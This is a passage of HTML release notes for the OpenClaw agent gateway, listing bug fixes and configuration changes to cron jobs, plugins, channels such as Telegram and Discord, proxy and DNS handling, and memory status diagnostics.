<p>Cron/status: render explicit <code>delivery.mode: "none"</code> jobs as no-delivery previews and label cron session history distinctly instead of showing fallback delivery or direct-session rows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373002812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76945/hovercard" href="https://github.com/openclaw/openclaw/issues/76945">#76945</a>.</p>
</li>
<li>
<p>Gateway/usage: serve <code>usage.cost</code> and <code>sessions.usage</code> from a durable transcript aggregate cache with lock-safe background refreshes and localized stale-cache status, so large usage views avoid repeated full scans. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371689139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76650" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76650/hovercard" href="https://github.com/openclaw/openclaw/pull/76650">#76650</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>.</p>
</li>
<li>
<p>Plugins/hooks: let <code>plugins.entries.&lt;id&gt;.hooks.timeoutMs</code> and <code>plugins.entries.&lt;id&gt;.hooks.timeouts</code> bound plugin typed hooks from operator config, so slow hooks can be tuned without patching installed plugin code. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372195245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76778" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76778/hovercard" href="https://github.com/openclaw/openclaw/issues/76778">#76778</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram: add <code>channels.telegram.mediaGroupFlushMs</code> at the top level and per account so operators can tune album buffering instead of being stuck with the hard-coded 500ms media-group flush window. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369407591" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76149/hovercard" href="https://github.com/openclaw/openclaw/issues/76149">#76149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Config/messages: coerce boolean <code>messages.visibleReplies</code> and <code>messages.groupChat.visibleReplies</code> values to the documented enum modes so an intuitive toggle no longer invalidates config and drops channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362618830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75390" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75390/hovercard" href="https://github.com/openclaw/openclaw/issues/75390">#75390</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</p>
</li>
<li>
<p>Agents/network: allow trusted web-search providers and configured model-provider hosts to work behind Surge/Clash/sing-box fake-IP DNS by accepting RFC 2544 and IPv6 ULA synthetic answers only for the request's scoped hostname, without broad private-network access. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371165031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76530/hovercard" href="https://github.com/openclaw/openclaw/pull/76530">#76530</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371221003" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76549" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76549/hovercard" href="https://github.com/openclaw/openclaw/pull/76549">#76549</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>Providers: honor env-proxy settings for guarded provider model fetches when no explicit dispatcher policy is configured, preserving explicit transport overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313226664" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70453" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70453/hovercard" href="https://github.com/openclaw/openclaw/issues/70453">#70453</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332554258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72480" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72480/hovercard" href="https://github.com/openclaw/openclaw/pull/72480">#72480</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</p>
</li>
<li>
<p>Web fetch: add a default-off <code>tools.web.fetch.useTrustedEnvProxy</code> opt-in for proxy-only environments so <code>web_fetch</code> can let an operator-controlled HTTP(S) proxy resolve DNS while preserving default strict DNS pinning and hostname policy checks. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174983773" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58034" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58034/hovercard" href="https://github.com/openclaw/openclaw/pull/58034">#58034</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218664195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62560" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62560/hovercard" href="https://github.com/openclaw/openclaw/issues/62560">#62560</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cosmicnet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cosmicnet">@cosmicnet</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</p>
</li>
<li>
<p>Feishu: accept and honor <code>channels.feishu.blockStreaming</code> at the top level and per account, while keeping the legacy default off so Feishu cards no longer reject documented config or silently drop block replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363708099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75555" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75555/hovercard" href="https://github.com/openclaw/openclaw/issues/75555">#75555</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/update: avoid <code>launchctl kickstart -k</code> immediately after fresh macOS update bootstraps, and unlink dangling global plugin-runtime symlinks during packaged postinstall and <code>doctor --fix</code> so upgrades no longer SIGTERM the newly booted Gateway or leave bundled plugin imports pointed at pruned <code>plugin-runtime-deps</code> trees. Completes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370027099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76261" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76261/hovercard" href="https://github.com/openclaw/openclaw/issues/76261">#76261</a> and fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370948926" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76466" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76466/hovercard" href="https://github.com/openclaw/openclaw/issues/76466">#76466</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372917596" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76929" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76929/hovercard" href="https://github.com/openclaw/openclaw/pull/76929">#76929</a>)</p>
</li>
<li>
<p>Google Chat: normalize custom Google auth transport headers before google-auth/gaxios interceptors run, restoring webhook token verification when certificate retrieval expects Fetch <code>Headers</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372087228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76742" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76742/hovercard" href="https://github.com/openclaw/openclaw/issues/76742">#76742</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donbowman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donbowman">@donbowman</a>.</p>
</li>
<li>
<p>Doctor/plugins: reset stale <code>plugins.slots.memory</code> and <code>plugins.slots.contextEngine</code> references during <code>doctor --fix</code>, so cleanup of missing plugin config does not leave unrecoverable slot owners behind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371224583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76550/hovercard" href="https://github.com/openclaw/openclaw/issues/76550">#76550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371225742" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76551" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76551/hovercard" href="https://github.com/openclaw/openclaw/issues/76551">#76551</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Docs/WhatsApp: merge the duplicate top-level <code>web</code> objects in the gateway channel config example so copy-pasted WhatsApp config keeps both <code>web.whatsapp</code> and reconnect settings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371502896" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76619" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76619/hovercard" href="https://github.com/openclaw/openclaw/issues/76619">#76619</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>.</p>
</li>
<li>
<p>Plugins/Anthropic: expose Claude thinking profiles from the bundled provider-policy artifact so non-runtime callers keep Opus 4.7 <code>adaptive</code>, <code>xhigh</code>, and <code>max</code> instead of downgrading to <code>high</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372204983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76779" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76779/hovercard" href="https://github.com/openclaw/openclaw/issues/76779">#76779</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomascupr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomascupr">@tomascupr</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iAbhi001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iAbhi001">@iAbhi001</a>.</p>
</li>
<li>
<p>Plugins/tools: honor <code>tools.alsoAllow</code> as an optional plugin tool discovery hint without treating its internal allow-all default as permission to load every manifest-marked optional plugin tool. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371480161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76616" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76616/hovercard" href="https://github.com/openclaw/openclaw/issues/76616">#76616</a>.</p>
</li>
<li>
<p>Discord/native commands: skip slash-command registration and cleanup REST calls when <code>channels.discord.commands.native=false</code>, letting low-power gateways start without waiting on disabled native-command lifecycle requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369686252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76202" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76202/hovercard" href="https://github.com/openclaw/openclaw/issues/76202">#76202</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/plugins: reject unowned command roots such as <code>openclaw foo</code> before managed proxy startup and full plugin CLI runtime loading while preserving manifest-owned and CLI-metadata-owned plugin commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361630008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75287/hovercard" href="https://github.com/openclaw/openclaw/issues/75287">#75287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neilofneils404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neilofneils404">@neilofneils404</a>.</p>
</li>
<li>
<p>CLI/message: skip local configured-channel plugin preload for explicit gateway-owned message actions, letting normalized CLI delivery delegate to the gateway without initializing channel runtime in the short-lived CLI process. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363198122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75477/hovercard" href="https://github.com/openclaw/openclaw/issues/75477">#75477</a>.</p>
</li>
<li>
<p>Plugins/commands: normalize empty plugin command handler results and let Telegram native plugin commands send the empty-response fallback instead of throwing when a handler returns <code>undefined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355136227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74800/hovercard" href="https://github.com/openclaw/openclaw/issues/74800">#74800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cold-load selected plugin tool registries when the active registry only has partial tool coverage, so wildcard-expanded allowlists no longer hide installed plugin tools from <code>tools.effective</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372207787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76780/hovercard" href="https://github.com/openclaw/openclaw/issues/76780">#76780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lilesjtu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lilesjtu">@lilesjtu</a>.</p>
</li>
<li>
<p>Plugins/tools: compare cached and runtime plugin tool name conflicts with normalized core tool names, so case variants of core tools are blocked instead of leaking duplicate tool registrations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/OpenRouter: advertise DeepSeek V4 thinking levels, including <code>xhigh</code> and <code>max</code>, through the runtime and lightweight provider policy surfaces so <code>/think</code> validation no longer rejects OpenRouter-routed DeepSeek V4 models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355101928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74788" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74788/hovercard" href="https://github.com/openclaw/openclaw/issues/74788">#74788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Status/sessions: ignore malformed non-string persisted session provider/model metadata instead of throwing while rendering status summaries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369700535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76206/hovercard" href="https://github.com/openclaw/openclaw/issues/76206">#76206</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/config: remove only the targeted array element for <code>openclaw config unset array[index]</code> instead of replaying the unset during config write and deleting the shifted next element. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370277739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76290/hovercard" href="https://github.com/openclaw/openclaw/issues/76290">#76290</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/voice-call: treat abnormal local Gateway close code 1006 as a standalone CLI fallback case, so <code>voicecall smoke</code> and related commands can still run the provider check path when the Gateway socket closes before returning a response.</p>
</li>
<li>
<p>CLI/doctor: migrate legacy per-channel <code>streaming.progress</code> config into <code>streaming.preview.toolProgress</code>, so upgrades with stale Discord or Telegram streaming keys validate again instead of blocking plugin commands.</p>
</li>
<li>
<p>Plugins/release: reject ClawHub code-plugin packages that contain TypeScript runtime entries without compiled <code>dist/*.js</code> output, and run package-local runtime-build checks during npm and ClawHub plugin release previews.</p>
</li>
<li>
<p>Plugins/update: keep beta-installed OpenClaw package updates on the beta plugin channel even when config still says stable, so Discord and other externalized plugins update from compiled <code>@beta</code> packages instead of stale source-only <code>latest</code> artifacts.</p>
</li>
<li>
<p>Agents/tools: stop treating <code>tools.deny: ["write"]</code> as an implicit <code>apply_patch</code> deny; operators who want to block patch writes should deny <code>apply_patch</code> or <code>group:fs</code> explicitly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372125703" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76749/hovercard" href="https://github.com/openclaw/openclaw/issues/76749">#76749</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372261939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76795" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76795/hovercard" href="https://github.com/openclaw/openclaw/pull/76795">#76795</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nek-12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nek-12">@Nek-12</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/release: verify published plugin npm tarballs expose compiled runtime entries after publish, catching TS-only package artifacts before release closeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/message: exit cleanly with a nonzero status when message-command plugin registry loading fails before dispatch, preventing <code>openclaw-message</code> children from staying alive after plugin load errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369518725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76168/hovercard" href="https://github.com/openclaw/openclaw/issues/76168">#76168</a>.</p>
</li>
<li>
<p>Plugins/config: report configured plugins that are present but blocked by path-safety checks as blocked instead of stale <code>plugin not found</code> entries, and deduplicate repeated blocked-candidate warnings during discovery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369376180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76144" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76144/hovercard" href="https://github.com/openclaw/openclaw/issues/76144">#76144</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mayank6136/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mayank6136">@mayank6136</a>.</p>
</li>
<li>
<p>Gateway/update: recover an installed-but-unloaded macOS LaunchAgent after package updates, rerun Gateway health/version/channel readiness checks, and print restart, reinstall, and rollback guidance before reporting update failure. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372245183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76790/hovercard" href="https://github.com/openclaw/openclaw/pull/76790">#76790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonathanlindsay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonathanlindsay">@jonathanlindsay</a>.</p>
</li>
<li>
<p>CLI/plugins: explain when a missing plugin command alias belongs to a bundled plugin that is disabled by default, including the <code>openclaw plugins enable &lt;plugin&gt;</code> repair command. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372434646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76835" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76835/hovercard" href="https://github.com/openclaw/openclaw/pull/76835">#76835</a>)</p>
</li>
<li>
<p>Gateway/Bonjour: auto-start LAN multicast discovery only on macOS hosts while preserving explicit <code>openclaw plugins enable bonjour</code> startup elsewhere, so Linux servers and containers that do not need LAN discovery avoid default mDNS probing and watchdog churn. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348958904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74209/hovercard" href="https://github.com/openclaw/openclaw/issues/74209">#74209</a>.</p>
</li>
<li>
<p>Gateway/macOS: stop <code>doctor</code> and LaunchAgent recovery from running <code>launchctl kickstart -k</code> after a fresh bootstrap, avoiding an immediate SIGTERM of the just-started gateway while still nudging already-loaded launchd jobs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370027099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76261" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76261/hovercard" href="https://github.com/openclaw/openclaw/issues/76261">#76261</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solosage1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solosage1">@solosage1</a>.</p>
</li>
<li>
<p>Google Meet: route stateful CLI session commands through the gateway-owned runtime so joined realtime sessions survive after the starting CLI process exits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370516508" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76344" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76344/hovercard" href="https://github.com/openclaw/openclaw/issues/76344">#76344</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coltonharris-wq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coltonharris-wq">@coltonharris-wq</a>.</p>
</li>
<li>
<p>Memory/status: split builtin sqlite-vec store readiness from embedding-provider readiness in <code>memory status --deep</code> and <code>openclaw status</code>, so local vector-store failures no longer look like provider failures and provider failures no longer hide a healthy local vector store.</p>
</li>
<li>
<p>CLI/doctor: trust a ready gateway memory probe when CLI-side active memory backend resolution is unavailable, preventing false "No active memory plugin is registered" warnings for healthy runtime setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372247083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76792" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76792/hovercard" href="https://github.com/openclaw/openclaw/issues/76792">#76792</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/som-686/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/som-686">@som-686</a>.</p>
</li>
<li>
<p>Memory/status: keep plain <code>openclaw memory status</code> and <code>openclaw memory status --json</code> on the cheap read-only path by reserving vector and embedding provider probes for <code>--deep</code> or <code>--index</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372172451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76769" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76769/hovercard" href="https://github.com/openclaw/openclaw/issues/76769">#76769</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daruire/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daruire">@daruire</a>.</p>
</li>
<li>
<p>Telegram: suppress stale same-session replies when a newer accepted message arrives before an older in-flight Telegram dispatch finalizes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371606977" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76642/hovercard" href="https://github.com/openclaw/openclaw/issues/76642">#76642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: throttle repeated long-running active-work session warnings so healthy cron or subagent runs no longer print the same <code>recovery=none</code> line every heartbeat.</p>
</li>
<li>
<p>Gateway/diagnostics: keep non-blocking active-work and transient event-loop max-spike liveness diagnostics out of the default gateway console while preserving structured diagnostic events and warnings for queued, stalled, and recovery-eligible work.</p>
</li>
<li>
<p>Slack: collapse routine Socket Mode pong-timeout reconnects into one OpenClaw reconnect line and suppress the duplicate Slack SDK pong warning.</p>
</li>
<li>
<p>Gateway/diagnostics: abort-drain embedded runs after an extended no-progress stall so a single dead session no longer leaves queued Discord/channel turns blocked behind repeated <code>recovery=none</code> liveness warnings.</p>
</li>
<li>
<p>Plugins/ClawHub: accept the live artifact resolver <code>kind</code>/<code>sha256</code> field names alongside the typed <code>artifactKind</code>/<code>artifactSha256</code> form so <code>clawhub:</code> installs of npm-pack and legacy ZIP packages no longer miss downloadable artifacts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Control UI/Sessions: avoid full <code>sessions.list</code> reloads for chat-turn <code>sessions.changed</code> payloads, so large session stores no longer add multi-second delays while chat responses are being delivered. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371812018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76676" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76676/hovercard" href="https://github.com/openclaw/openclaw/pull/76676">#76676</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</p>
</li>
<li>
<p>Gateway/watch: run <code>doctor --fix --non-interactive</code> once and retry when the dev Gateway child exits during startup, so stale local plugin install/config state does not leave the tmux watch session disappearing without a repair attempt.</p>
</li>
<li>
